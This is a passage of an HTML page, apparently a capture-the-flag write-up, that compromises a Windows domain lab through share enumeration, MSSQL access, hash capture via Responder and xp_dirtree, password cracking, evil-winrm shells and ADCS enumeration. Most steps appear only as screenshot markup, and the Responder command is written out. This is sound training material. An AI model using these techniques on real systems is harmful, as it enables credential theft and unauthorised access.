FWHJpR09SaDEUoEHEAUbr4tqM/F9kfgFIzbLJcR0WxdBiXjaOCzzI55bR40F0zAk7tgKocEWaTZqb88zgc0ynfActYYE97liYFEjZQKVjZSwMjbn4jswYJJz22E+r6sEyZ3nnRZcoL4LUpUYscXa4AGHy34kCXC7Dlbw3o13cQp+/Imb1pOKPluiqasw53KpegK1AFuGEOrwOuLHmrv8f5kdHhjUknHbeId9zwuq/wDt8RlwTbP6GfXtCNTyjqkwasuVnCdGCoCcgFseFNSQgoCBhyN9oeM+lUWpEobniXuy/w5h/cIAw0vUsEJQt6GC3+KdkXyQpw7U/cLncaMHsr1VglYkdw49PwN345/QczmSn3Ad3whKZ70KwiLt2Ufiqv1lqywCrmepu+UcUj6xk9q+RdVo1VU8OuP+Oq/sol2pHhqFnGas0zMm7Y8GBLhvKd4cY/IqCaNJ+0ZMVQxetyTQ23ecYqf+SUuJJibl9mMVA5JH3Hr/WNUbHQYGrjeAO8hLdJKSABxX5lCoLtNUvD4z5cZyeuqAoB2fjKNxps832nisBb+wNw4/b0d2mqQNQFUFtIDcUJW/wP2vDI2T950OkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec spider_plus" title="" src="/static/20e7612ffdcfb877e22fdf16c8a0376b/50637/netexec-spider_plus.png" srcset="/static/20e7612ffdcfb877e22fdf16c8a0376b/dda05/netexec-spider_plus.png 158w, /static/20e7612ffdcfb877e22fdf16c8a0376b/679a3/netexec-spider_plus.png 315w, /static/20e7612ffdcfb877e22fdf16c8a0376b/50637/netexec-spider_plus.png 630w, /static/20e7612ffdcfb877e22fdf16c8a0376b/d2eea/netexec-spider_plus.png 688w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">Public</code> contained a PDF document:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 470px; " > <a class="gatsby-resp-image-link" href="/static/3cbddd42f6cc98c019acc6d9a92b16f8/5d579/netexec-spider_plus-json.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABlElEQVR42n2R3VPaQBTF+VeE3c0m5BPZfBAgAWIEFEeoQMc69qGd8aH9/19Pz6IzVm19OHPuTrK/PffejhOO4JgNlNnDHT3AzY9wkwr14hZXN99wuT6iXX/FmvWs2eJieUDd7FBOr9Es95i3d/x3i7y6Rs9J0QnTJVTcwBssMJl/QTmjqg3aFUG83K4OCMwSUb5CPxrDjyv6FF44OdV+POV5AjcYQ+gMHZ+FGu4gkhvooEIY5hDyHF2R4Kw3oOiCrgy6aoiu/Sat2/OrbLoTUMgBZNRClT/hjB6hy0dIc4TK7qGKezjFASq9g5NuEaVz9AcVpF9A9kcnwHt1pE4hZcK215DlD4jsgf4Ene45hhpBdQUv40jMnE5gwZoK8gbKK9D7ALRRbcrzHVT9mym/Q9a/4GY7+MOKwBVhNdwhxYRevqDP4GcLAvOPQMG59NmCjhrIZAPXH8NuXscTaLanfLbGeQnFh50XsSvhvrhO3wIDbijkppRjIAmXjpV5vqjMK+S99L9EYGyHbAHqGfS3/gv7BPwHafQfT64iiNwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec spider_plus JSON" title="" src="/static/3cbddd42f6cc98c019acc6d9a92b16f8/5d579/netexec-spider_plus-json.png" srcset="/static/3cbddd42f6cc98c019acc6d9a92b16f8/dda05/netexec-spider_plus-json.png 158w, /static/3cbddd42f6cc98c019acc6d9a92b16f8/679a3/netexec-spider_plus-json.png 315w, /static/3cbddd42f6cc98c019acc6d9a92b16f8/5d579/netexec-spider_plus-json.png 470w" sizes="(max-width: 470px) 100vw, 470px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Downloaded the document:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5446c0909f043f164a8ccdb7b4a292c0/d2eea/netexec-download-document.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.316455696202528%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHElEQVR42i2Q2W7CMBRE8ylVES3B2ZyEOPsKJCSA2qqt+P8fOb2peBhZlo9n5l5LBRXK3LHTb3wzU3c3pvnBuDzoTp9U7YLtlezcgiDuCaMa5eVs5b5qrxJc1+A4BqUMlk5mTNIShiVt/0Hd3v+V5heSciJpZnR+RkUd++wioQtZc0ObIypoiA49OmoI4w5P11i2+cGLBjxpWglYVAu5KDwM+MkRt77wZjreBX7VEy/ZF3p4kBUTsTnjiOnOKWSKSqYosZzsF1dLupOJ4ZVStBrGYpakIyY9E4Qt251hswnYetJGjA7ZSCRvoXCr4pWLeqwgvaJlN7FUr5rlmXzC5CMHgVZF8kFL45Xzs4H9une/knb182zwww7bLfgD0fymegB9eKcAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec download document" title="" src="/static/5446c0909f043f164a8ccdb7b4a292c0/50637/netexec-download-document.png" srcset="/static/5446c0909f043f164a8ccdb7b4a292c0/dda05/netexec-download-document.png 158w, /static/5446c0909f043f164a8ccdb7b4a292c0/679a3/netexec-download-document.png 315w, /static/5446c0909f043f164a8ccdb7b4a292c0/50637/netexec-download-document.png 630w, /static/5446c0909f043f164a8ccdb7b4a292c0/d2eea/netexec-download-document.png 688w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The "Bonus" section of the PDF contained credentials to access the MSSQL mock instance:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1a30d1a5c201b4546e456f1503ba3875/e1040/sql-server-procedures.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.08860759493672%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABt0lEQVR42pVTW5KiQBD0/ufQUQ/gPfwxDCNUntLyaGBWHopCTmdpM+vsfuwSkRRUN9mZVcWk73scj0c4joMgCOD7vsT9fo8kScBrGAb86zXhZhLudjtst1uJm80G6/Uah8MBWZYhTdMRfLfgu9YaeZ7L++PxeBKez2dRZT+K41g2ElEUybpSSsBnrjPaNcayLMWJENIaCRl5mgU3EUVRiIIiL+TApmlwu90EVPWHZa0zOYU4nUKD00uNklxocnVdo21bIWuaWsDc/X5/q/OEN51pHPYOPM83TQnhuWzMSaLnBXCOLi6/KkPQPlE1uFxqdN0d5DF9/VbI2/XaIVYlzlFuUAhilSOOSujUEF06fBaG5PP2hrbuca0HdNfhnZDSaZH2lIrEsi2+MraTNJE6cp+1TlRV9fcashme5wnCMBS4riszSXBGfT8wTlpj89mMrusk/pzRkZAkVCSqXmqp8vexoBr+CIwEG0KQuH8VciTkIM9mMywWCyyXy1dc4ONjhvl8LjlGYjqdYrVaycEUQDE8cCTkjDFJJXyWoc61aYSpVdONNi1ol7B2Gd/GxiZ+gi7+4zcWwi8WoNiQuQAf7gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="SQL Server Procedures" title="" src="/static/1a30d1a5c201b4546e456f1503ba3875/50637/sql-server-procedures.png" srcset="/static/1a30d1a5c201b4546e456f1503ba3875/dda05/sql-server-procedures.png 158w, /static/1a30d1a5c201b4546e456f1503ba3875/679a3/sql-server-procedures.png 315w, /static/1a30d1a5c201b4546e456f1503ba3875/50637/sql-server-procedures.png 630w, /static/1a30d1a5c201b4546e456f1503ba3875/e1040/sql-server-procedures.png 792w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/12eef420d616b708124db7f986d26b4a/e1040/sql-server-procedures-bonus.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAk0lEQVR42q1QUQqFIBD0/tcIxA9v0D2CfoWQikrU1EibWKFH/b+FYWeZZWd3mXMOx3HgX8GUUuj7HsYYhBDgvcc8z5imCcuyIMb4AfWklD71vu8VpRQwrTU452jbFsMwoOs6CCHQNA2klBjHEdu21eHrutZM5u/aWltNrusCI/KA3MiVOL2B8NYf7TzPz5Y559/JN3aTMhN0HLIfAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="SQL Server Procedures Bonus" title="" src="/static/12eef420d616b708124db7f986d26b4a/50637/sql-server-procedures-bonus.png" srcset="/static/12eef420d616b708124db7f986d26b4a/dda05/sql-server-procedures-bonus.png 158w, /static/12eef420d616b708124db7f986d26b4a/679a3/sql-server-procedures-bonus.png 315w, /static/12eef420d616b708124db7f986d26b4a/50637/sql-server-procedures-bonus.png 630w, /static/12eef420d616b708124db7f986d26b4a/e1040/sql-server-procedures-bonus.png 792w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Connected to the server using <code class="language-text">impacket-mssqlclient</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/fab2469f4c8d14a9f84cca163cef76b7/e8a52/connect-to-db.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABY0lEQVR42lWR6VaDMBCFeRVtkdLSjQZIWFN2KGCx9qj1/Z/jOkQ91R9zZsiQb+7caMahgeFeoLMRFssRHs+IsxH16R1ZeaHvActtDGsXY7WJsKJ6vU8oJJ0lqjbXIZ1H0E0BjQUd1k6JrVdTVLB5DRH3kOkZImzgxy2CpMfBK8F4qWoRtuDU45QdUakhE1w3OTTOC4TUDKYfghpB1MJmGTy/BvMK7FgK28lIhY8lKTStQCk1Vj5mhov5wlP5t9Zk+ox++EQ33NB0H2i7mwLLjFaXA1xSIPMR0bEndZ1SmFdXpehBZwryN7RY9qiaK8r6iub0ptbkQQOXE4i8DAmQla84Fi+I0wEhDZn6IjopCyal/4E0dYJmxajWdsmCyb8g6pAS5EjqFID8mtTunRQLy1ePtLElAQWB3DuQuTk8UUKQZzs7gaB1/QlMlxMCb+gV5+TPI603e3Lu+YmpmBnOD/A7vgA6keqzEqEe8QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="connect to DB" title="" src="/static/fab2469f4c8d14a9f84cca163cef76b7/50637/connect-to-db.png" srcset="/static/fab2469f4c8d14a9f84cca163cef76b7/dda05/connect-to-db.png 158w, /static/fab2469f4c8d14a9f84cca163cef76b7/679a3/connect-to-db.png 315w, /static/fab2469f4c8d14a9f84cca163cef76b7/50637/connect-to-db.png 630w, /static/fab2469f4c8d14a9f84cca163cef76b7/e8a52/connect-to-db.png 666w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Only the default databases were on the instance:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 539px; " > <a class="gatsby-resp-image-link" href="/static/d6dcb47544cca5dd06ac850f96f7d87f/4330c/list-dbs.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.645569620253163%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAvklEQVR42p2QSQ7CMAxFc5VSp4PU0gxNi4ToQFlx//t8HBdQGTawePoe4i876ni6ImLcCOPPqJoBtRnhwsJcsLcTKnOCDdwzAxo3o+ba/q5xxvLbGOvyAGX9BN8tSLMWO3KiaRaQkBd2mutcS7QXXQlPEt0KMaaih2rsgJYN87KHzgPTgRjNzQhtcipYy632slWEijVXrp3l5GhIWRBTErrvFO/0LyjnZ8SziU9ZN3yYdn+Zyh82dvww/N105QYlVLgXSIYQbgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list DBs" title="" src="/static/d6dcb47544cca5dd06ac850f96f7d87f/4330c/list-dbs.png" srcset="/static/d6dcb47544cca5dd06ac850f96f7d87f/dda05/list-dbs.png 158w, /static/d6dcb47544cca5dd06ac850f96f7d87f/679a3/list-dbs.png 315w, /static/d6dcb47544cca5dd06ac850f96f7d87f/4330c/list-dbs.png 539w" sizes="(max-width: 539px) 100vw, 539px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I tried to intercept a hash from the SQL server. So I started Responder:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">sudo responder -I tun0</code></pre></div> <p>Then, I used the MSSQL function <code class="language-text">xp_dirtree</code> to list directories and files on the specified SMB host:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b8bda667926711444f3a801c656825ce/abbf1/xp_dirtree.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.658227848101264%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAnklEQVR42mWNWw6CMBBF2YoRqVAsj9LSQgoWJBg/NO5/MdehJCbGj5N7Zm4yE9n+DtOtqOQVrV1gaFZmRSkniGqE1DfUzRwopUepJtTbjuCFo5yDF9TVekE0+id694Cg0k+vcDjLO5x5h7wYkJKzzBAWLDW78w2LU9p+Pcn2jOrGQ9JXUQ6EgzZL4ELu5ze4cDjEEsdE/REzjSNTP3wAVeBgThMRgIMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="xp_dirtree" title="" src="/static/b8bda667926711444f3a801c656825ce/50637/xp_dirtree.png" srcset="/static/b8bda667926711444f3a801c656825ce/dda05/xp_dirtree.png 158w, /static/b8bda667926711444f3a801c656825ce/679a3/xp_dirtree.png 315w, /static/b8bda667926711444f3a801c656825ce/50637/xp_dirtree.png 630w, /static/b8bda667926711444f3a801c656825ce/abbf1/xp_dirtree.png 656w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This caused an authentication attempt and the NTLMv2 hash for <code class="language-text">sql_svc</code> was captured:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/07ffabd34f2818f36e63436fd060e3aa/d2eea/sql_svc-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 26.58227848101266%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/ElEQVR42kWQXW6DMBCEuUqfSKjSSkXBP7t2MIYkQGic9gBV73+I6Rpa9eHT7qx3RtYWT/obr+0X4pDAIcH4GxqacHgheGWgagNdW+wqjd2zRrlXKCslWmG/aqEy8mZQii7e9ATnJ0TfIbgOUfDKwTV2DeTGIFqLVhM6QwjCQISzcGFGZ7PmFXMkFK1qMLPClTTOVmOwBiNbTC6bLHoJG6XPXHgLy0GjY1yFXnSuk3egRgJ7Y/EIjHQi3IXFMxap7ycWCLMn3E5/JsYs83vIODw62Wk3/Rm9fMChiMbgIxDSLzksZUO7LWeyMQmL9CSncMquJ6HjP15mqrb4AdUEq6iOoLjOAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sql_svc hash" title="" src="/static/07ffabd34f2818f36e63436fd060e3aa/50637/sql_svc-hash.png" srcset="/static/07ffabd34f2818f36e63436fd060e3aa/dda05/sql_svc-hash.png 158w, /static/07ffabd34f2818f36e63436fd060e3aa/679a3/sql_svc-hash.png 315w, /static/07ffabd34f2818f36e63436fd060e3aa/50637/sql_svc-hash.png 630w, /static/07ffabd34f2818f36e63436fd060e3aa/d2eea/sql_svc-hash.png 688w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">JtR</code> cracked the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/24bf63fc2fedb317c9ff1ff9af918a4b/cb163/crack-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 30.37974683544304%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABI0lEQVR42lWRW26DMBREWQuFQBAPQwjGQHjYhpYmTVTUj+5/I9NrJ42Uj6OxLXTsuTgBGxFUV7D+F1G5oOxW9PP2RExfCLIT/LiFnxBxAy8ScAMON+R429d3aO36GRx+uqBVG6blh9hofcOgN3Tyhrq/4NiuyCqNpJQoxGJhR404nyz/Ui9q4O4KOMP4ia5bUAsFpa9o6YWTuqLkGuwwESQiwR2FjM4OfEFaSPhGEvIXnJqPmNUZWp7RNhoVlxBCIj9OSPLRCtJipL22e1YqysFmlPVISJyYS8Q7paTKVGlQ32ioXlqQhA0oqCIzFSmNzKQRG4k9sxdJ+8q8mmkEM0qxWrFT1TNE+2HrHejjvRl+WMHf8yc7+gk+zekV/khh8R78AQwuxLhmdFpmAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crack password" title="" src="/static/24bf63fc2fedb317c9ff1ff9af918a4b/50637/crack-password.png" srcset="/static/24bf63fc2fedb317c9ff1ff9af918a4b/dda05/crack-password.png 158w, /static/24bf63fc2fedb317c9ff1ff9af918a4b/679a3/crack-password.png 315w, /static/24bf63fc2fedb317c9ff1ff9af918a4b/50637/crack-password.png 630w, /static/24bf63fc2fedb317c9ff1ff9af918a4b/cb163/crack-password.png 687w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">evil-winrm</code> shell as <code class="language-text">sql_svc</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 549px; " > <a class="gatsby-resp-image-link" href="/static/fa004877b804ab08d27b12936b2b1319/5dbd2/evil-winrm-sql_svc.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.68354430379747%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABD0lEQVR42lWP7W6CQBREfRKtlC9hgQVWEVRAUKvSJqZp2qTv/x6nV5qm7Y+Tmd3szr0z8eIKzww45hW3eMfRPcXmzNPlg/70xvXlk+Zwozve0HmN66+wg5IgXKPUetQfHL9g4kU7/OyCnx7xzRUnbkjyjnI7YIoj6+qCyltyCcvTijCSj2pDJn6ZlWS6JNXf6i4k0A523HFUx2PQYC1q5l7F9HHJdK6ZWSkPdibnlJno3DVYjhFvxBdY3i/2fcMwrFFhQxy26KiTWgfZ6EqyGohXz0TmjMpO6FIqFwNK7hPxcd6PFe/Yf5gYXbNd9myk1jZvxhphUpNke+K0HYl0I4O6ESXvk3wvtDiL/2H3wC/QSJ+k0VramwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm shell as sql_svc" title="" src="/static/fa004877b804ab08d27b12936b2b1319/5dbd2/evil-winrm-sql_svc.png" srcset="/static/fa004877b804ab08d27b12936b2b1319/dda05/evil-winrm-sql_svc.png 158w, /static/fa004877b804ab08d27b12936b2b1319/679a3/evil-winrm-sql_svc.png 315w, /static/fa004877b804ab08d27b12936b2b1319/5dbd2/evil-winrm-sql_svc.png 549w" sizes="(max-width: 549px) 100vw, 549px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There was an error log in <code class="language-text">C:\SQLServer\Logs</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 523px; " > <a class="gatsby-resp-image-link" href="/static/7b15e8ac271e76a57953693a22cd8f6f/7cd60/sqlserver-logs.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.645569620253163%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHElEQVR42n2R226DMBBE+ZQGgomxjTGYSyDhkgQllXpR//9jpruWGikvfVjtYmsOM+tIZw1MWkPvK1iqynjkeoCtV1i3wJQTzQsKN0OaE/aH7t+KEgJmBFAklHZCmg+QeoQqzsgJkBuaLYNaxKIJolT2L/0VSK6UGVA3FzhypQlkqwW+21DSd0Euq/YKkfcByqIka5/FZwz+g0eO4ihysUscYoqekIu3pAqdwZpca3vGQR/BaRigyxkF3fE9r2GX+qf7qO03NN0NaeYhSCBkF6J2wwPj9IF+fMd6+4GjBLHwAdiND0yXb5yWL4zzJ4zjH6zBZSRVHyILjkMC7vwAVXPFQR3DLnlWxSk45JKUiNdQ+gt8f6f5hrrdAvAXlSy8SaTeqA0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sqlserver logs" title="" src="/static/7b15e8ac271e76a57953693a22cd8f6f/7cd60/sqlserver-logs.png" srcset="/static/7b15e8ac271e76a57953693a22cd8f6f/dda05/sqlserver-logs.png 158w, /static/7b15e8ac271e76a57953693a22cd8f6f/679a3/sqlserver-logs.png 315w, /static/7b15e8ac271e76a57953693a22cd8f6f/7cd60/sqlserver-logs.png 523w" sizes="(max-width: 523px) 100vw, 523px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Viewing <code class="language-text">ERRORLOG.BAK</code> revealed a password for <code class="language-text">Ryan.Cooper</code> due to a failed login attempt where the user must've mistakenly entered the password as the username:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e00d3c4a7fdba448ce089f6bc0d80322/39600/errorlog.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.810126582278485%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABaklEQVR42h2RWXKDMBBEuUoWpxwnGAPGWGgBicX7nvtfpdOjD5U0pVH361HStCfo9oxaH6DcCVt7hPEXdOMDRT3EOuxeMN0ZG71D011Qqh1Wmx553SMtHLLS4XelsUgVEs0GwyUP5VybQ9wtRWffNRp3hp+eaIcHbLijobm2BxSFhbF7rKuA988Sb7M13udbJOIsgkIpIoqCtrtC2RM+5psoYPw1CkoCSTSpES+en+0FN4IcSRtWDl+LGolls5MH/R0uXKOwHxiRzYvMxtrQIEyvaOT6B/Y0u5P8RpCjmqCrHst1j9m8RNLw0nNejbhzCW3LaPL4h4Ji6EeK+RvFmYBCB95PnPmV1GE7Iks18u0OP0tGVkSWqCIkpI7NfnyiI3FOVxHq+LAjmeNZZqplloH19IeKdWVOqGiQrgySutnHWEJXEV+ZI4RaZlnWYxSs+KvLvONveqTcZWVFYIIW2XpAviFlNWCeGvwDz23y/7cbeJAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="errorlog" title="" src="/static/e00d3c4a7fdba448ce089f6bc0d80322/50637/errorlog.png" srcset="/static/e00d3c4a7fdba448ce089f6bc0d80322/dda05/errorlog.png 158w, /static/e00d3c4a7fdba448ce089f6bc0d80322/679a3/errorlog.png 315w, /static/e00d3c4a7fdba448ce089f6bc0d80322/50637/errorlog.png 630w, /static/e00d3c4a7fdba448ce089f6bc0d80322/39600/errorlog.png 700w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The creds worked and <code class="language-text">evil-winrm</code> was able to make a connection:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 585px; " > <a class="gatsby-resp-image-link" href="/static/4699f5f71ebc6d0c16b7c75e5d1f6920/1f316/evil-winrm-ryan-cooper.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 52.53164556962025%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB/ElEQVR42mVSWZabQBDjKB5j9saA6WbHC3gZO7azvCQfuf89FBWemTdOPvSqoauEVMJyzQVO8QNu+QtONqDqzzicf2M4/cT59gf9cMd2f0eYNPDDAl5UYhFWCNQb4gq+KuGFBnN3BcvVF3j5CV5xhZPukBR7lO0ZebmHqQ8I0zWM6ZGmNfSqhlpWcOIWWVYjS0vo1CBLNJTSsD0DaxHvsEiPsJcjbLWFHfaYeTVmC42ZY/DiFZi5JaugwtwnODhbrPDi5gTPvJvzzg5qWFHUIyaSeINktUWUH7EsLkjKK5Q+ITYnJPWd716nqvQZcca+pKMi2ucHBLYgqGD1tNaZAV2+wW5zRNGckeQ7rGg9zQdkrCv2ZGaczkKWGd7pEeGy507bB9k7YROWWPsGY6SxbxtU3QX97iu243e06ys247fpLHXDWjSvVLcmWQddUTWJnwi9oEQgqYWSVMHEGoRxNw34qmWKgm5SI89uWNNiSbsFU5Vki2fCKOmZ6IEWhokko/0HRiy5U7EukB6xKyRCJqROUP2/Q5fqJO6FL01s5oAbVJPSIG64o+aDQM6i8l3p4/0nQsLS1YFf1ROZR3KfQ03/Bd32RlxR95cPi6Ja9tpubtzf6U3hc9KW4o/rUJ1NUsVl52KRg76qJ+uyisfQg1T2mTB9+RNk9l+VfwGI/l5g0LRKnQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm shell as ryan.cooper" title="" src="/static/4699f5f71ebc6d0c16b7c75e5d1f6920/1f316/evil-winrm-ryan-cooper.png" srcset="/static/4699f5f71ebc6d0c16b7c75e5d1f6920/dda05/evil-winrm-ryan-cooper.png 158w, /static/4699f5f71ebc6d0c16b7c75e5d1f6920/679a3/evil-winrm-ryan-cooper.png 315w, /static/4699f5f71ebc6d0c16b7c75e5d1f6920/1f316/evil-winrm-ryan-cooper.png 585w" sizes="(max-width: 585px) 100vw, 585px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>While looking for ways to escalate privileges, I checked if Active Directory Certificate Services was running by using the <code class="language-text">adcs</code> module from <code class="language-text">netexec</code> which found a certificate authority, sequel-DC-CA:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/dea5e5d77bbe5ee5e237052152b52e38/e899a/netexec-adcs.png" style="display: 